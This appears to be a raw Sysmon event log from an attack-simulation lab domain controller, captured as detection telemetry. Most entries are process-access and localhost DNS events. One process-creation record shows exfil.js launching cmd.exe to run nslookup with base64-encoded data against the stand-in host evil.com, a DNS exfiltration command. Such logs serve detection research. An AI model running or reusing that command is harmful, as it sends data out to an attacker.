14:21:34.060{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-FD43-000000005F02}7316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.060{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-FD43-000000005F02}7316C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{00000000-0000-0000-0000-000000000000}4816<unknown process>-udpfalsefalse127.0.0.1-50728-false127.0.0.1-53domain 354300x8000000000000000209811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{00000000-0000-0000-0000-000000000000}4816<unknown process>-udptruefalse127.0.0.1-50728-false127.0.0.1-53domain 354300x8000000000000000209810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{00000000-0000-0000-0000-000000000000}4816<unknown process>-udpfalsefalse127.0.0.1-50727-false127.0.0.1-53domain 354300x8000000000000000209809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.863{00000000-0000-0000-0000-000000000000}4816<unknown process>-udptruefalse127.0.0.1-50727-false127.0.0.1-53domain 354300x8000000000000000209808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{00000000-0000-0000-0000-000000000000}1152<unknown process>-udpfalsefalse127.0.0.1-50723-false127.0.0.1-53domain 354300x8000000000000000209807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{00000000-0000-0000-0000-000000000000}1152<unknown process>-udptruefalse127.0.0.1-50723-false127.0.0.1-53domain 354300x8000000000000000209806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{00000000-0000-0000-0000-000000000000}1152<unknown process>-udpfalsefalse127.0.0.1-50722-false127.0.0.1-53domain 354300x8000000000000000209805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{00000000-0000-0000-0000-000000000000}1152<unknown process>-udptruefalse127.0.0.1-50722-false127.0.0.1-53domain 354300x8000000000000000209804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{00000000-0000-0000-0000-000000000000}1152<unknown process>-udpfalsefalse127.0.0.1-50721-false127.0.0.1-53domain 354300x8000000000000000209803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.677{00000000-0000-0000-0000-000000000000}1152<unknown process>-udptruefalse127.0.0.1-50721-false127.0.0.1-53domain 354300x8000000000000000209802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.615{00000000-0000-0000-0000-000000000000}6068<unknown process>-udpfalsefalse127.0.0.1-50720-false127.0.0.1-53domain 354300x8000000000000000209801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.615{00000000-0000-0000-0000-000000000000}6068<unknown process>-udptruefalse127.0.0.1-50720-false127.0.0.1-53domain 354300x8000000000000000209800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.615{00000000-0000-0000-0000-000000000000}6068<unknown process>-udpfalsefalse127.0.0.1-50719-false127.0.0.1-53domain 354300x8000000000000000209799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.614{00000000-0000-0000-0000-000000000000}6068<unknown process>-udptruefalse127.0.0.1-50719-false127.0.0.1-53domain 354300x8000000000000000209798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.614{00000000-0000-0000-0000-000000000000}6068<unknown process>-udpfalsefalse127.0.0.1-50718-false127.0.0.1-53domain 354300x8000000000000000209797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.614{00000000-0000-0000-0000-000000000000}6068<unknown process>-udptruefalse127.0.0.1-50718-false127.0.0.1-53domain 354300x8000000000000000209796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.553{00000000-0000-0000-0000-000000000000}7260<unknown process>-udpfalsefalse127.0.0.1-50717-false127.0.0.1-53domain 354300x8000000000000000209795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.553{00000000-0000-0000-0000-000000000000}7260<unknown process>-udptruefalse127.0.0.1-50717-false127.0.0.1-53domain 354300x8000000000000000209794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{00000000-0000-0000-0000-000000000000}6676<unknown process>-udpfalsefalse127.0.0.1-50716-false127.0.0.1-53domain 354300x8000000000000000209793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{00000000-0000-0000-0000-000000000000}6676<unknown process>-udptruefalse127.0.0.1-50716-false127.0.0.1-53domain 354300x8000000000000000209792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{00000000-0000-0000-0000-000000000000}6676<unknown process>-udpfalsefalse127.0.0.1-50715-false127.0.0.1-53domain 354300x8000000000000000209791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{00000000-0000-0000-0000-000000000000}6676<unknown process>-udptruefalse127.0.0.1-50715-false127.0.0.1-53domain 354300x8000000000000000209790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.490{00000000-0000-0000-0000-000000000000}6676<unknown process>-udpfalsefalse127.0.0.1-50714-false127.0.0.1-53domain 354300x8000000000000000209789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.489{00000000-0000-0000-0000-000000000000}6676<unknown process>-udptruefalse127.0.0.1-50714-false127.0.0.1-53domain 354300x8000000000000000209788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.433{00000000-0000-0000-0000-000000000000}5772<unknown process>-udpfalsefalse127.0.0.1-50713-false127.0.0.1-53domain 354300x8000000000000000209787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.433{00000000-0000-0000-0000-000000000000}5772<unknown process>-udptruefalse127.0.0.1-50713-false127.0.0.1-53domain 354300x8000000000000000209786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.433{00000000-0000-0000-0000-000000000000}5772<unknown process>-udpfalsefalse127.0.0.1-50712-false127.0.0.1-53domain 354300x8000000000000000209785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.433{00000000-0000-0000-0000-000000000000}5772<unknown process>-udptruefalse127.0.0.1-50712-false127.0.0.1-53domain 354300x8000000000000000209784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.432{00000000-0000-0000-0000-000000000000}5772<unknown process>-udpfalsefalse127.0.0.1-50711-false127.0.0.1-53domain 10341000x8000000000000000209783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.060{2E1864BB-18EE-629A-FD43-000000005F02}73164672C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-FC43-000000005F02}1804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000209782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.432{00000000-0000-0000-0000-000000000000}5772<unknown process>-udptruefalse127.0.0.1-50711-false127.0.0.1-53domain 354300x8000000000000000209781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.353{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-50710-false127.0.0.1-53domain 354300x8000000000000000209780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.353{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-50710-false127.0.0.1-53domain 354300x8000000000000000209779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.353{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-50709-false127.0.0.1-53domain 354300x8000000000000000209778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.352{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-50709-false127.0.0.1-53domain 354300x8000000000000000209777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.352{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-50708-false127.0.0.1-53domain 354300x8000000000000000209776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.352{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-50708-false127.0.0.1-53domain 354300x8000000000000000209775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.269{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-50707-false127.0.0.1-53domain 354300x8000000000000000209774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.268{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-50707-false127.0.0.1-53domain 354300x8000000000000000209773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.268{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-50706-false127.0.0.1-53domain 354300x8000000000000000209772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.268{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-50706-false127.0.0.1-53domain 354300x8000000000000000209771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.267{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-50705-false127.0.0.1-53domain 354300x8000000000000000209770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.267{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-50705-false127.0.0.1-53domain 354300x8000000000000000209769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.175{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-50704-false127.0.0.1-53domain 354300x8000000000000000209768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.984{00000000-0000-0000-0000-000000000000}8092<unknown process>-udpfalsefalse127.0.0.1-50700-false127.0.0.1-53domain 354300x8000000000000000209767Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{00000000-0000-0000-0000-000000000000}8092<unknown process>-udpfalsefalse127.0.0.1-50698-false127.0.0.1-53domain 354300x8000000000000000209766Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.983{00000000-0000-0000-0000-000000000000}8092<unknown process>-udptruefalse127.0.0.1-50698-false127.0.0.1-53domain 354300x8000000000000000209765Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.907{00000000-0000-0000-0000-000000000000}3348<unknown process>-udpfalsefalse127.0.0.1-50696-false127.0.0.1-53domain 354300x8000000000000000209764Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.906{00000000-0000-0000-0000-000000000000}3348<unknown process>-udptruefalse127.0.0.1-50695-false127.0.0.1-53domain 354300x8000000000000000209763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.830{00000000-0000-0000-0000-000000000000}1488<unknown process>-udpfalsefalse127.0.0.1-50694-false127.0.0.1-53domain 354300x8000000000000000209762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.830{00000000-0000-0000-0000-000000000000}1488<unknown process>-udptruefalse127.0.0.1-50694-false127.0.0.1-53domain 354300x8000000000000000209761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.830{00000000-0000-0000-0000-000000000000}1488<unknown process>-udpfalsefalse127.0.0.1-50693-false127.0.0.1-53domain 354300x8000000000000000209760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.829{00000000-0000-0000-0000-000000000000}1488<unknown process>-udptruefalse127.0.0.1-50693-false127.0.0.1-53domain 354300x8000000000000000209759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.828{00000000-0000-0000-0000-000000000000}1488<unknown process>-udpfalsefalse127.0.0.1-50692-false127.0.0.1-53domain 354300x8000000000000000209758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.828{00000000-0000-0000-0000-000000000000}1488<unknown process>-udptruefalse127.0.0.1-50692-false127.0.0.1-53domain 354300x8000000000000000209757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.739{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50691-false127.0.0.1-53domain 354300x8000000000000000209756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.739{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50691-false127.0.0.1-53domain 354300x8000000000000000209755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.739{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50690-false127.0.0.1-53domain 354300x8000000000000000209754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.739{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50690-false127.0.0.1-53domain 354300x8000000000000000209753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.738{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50689-false127.0.0.1-53domain 354300x8000000000000000209752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.738{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-50689-false127.0.0.1-53domain 354300x8000000000000000209751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.662{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50688-false127.0.0.1-53domain 354300x8000000000000000209750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50688-false127.0.0.1-53domain 354300x8000000000000000209749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-50687-false127.0.0.1-53domain 354300x8000000000000000209748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.661{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-50686-false127.0.0.1-53domain 10341000x8000000000000000209747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-FD43-000000005F02}7316C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-FC43-000000005F02}1804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-18E0-629A-6742-000000005F02}39767884C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-FC43-000000005F02}1804C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.052{2E1864BB-18EE-629A-FC43-000000005F02}1804C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodmc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.044{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlovrd.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.013{2E1864BB-18ED-629A-FA43-000000005F02}60926848C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-FB43-000000005F02}3736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.013{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 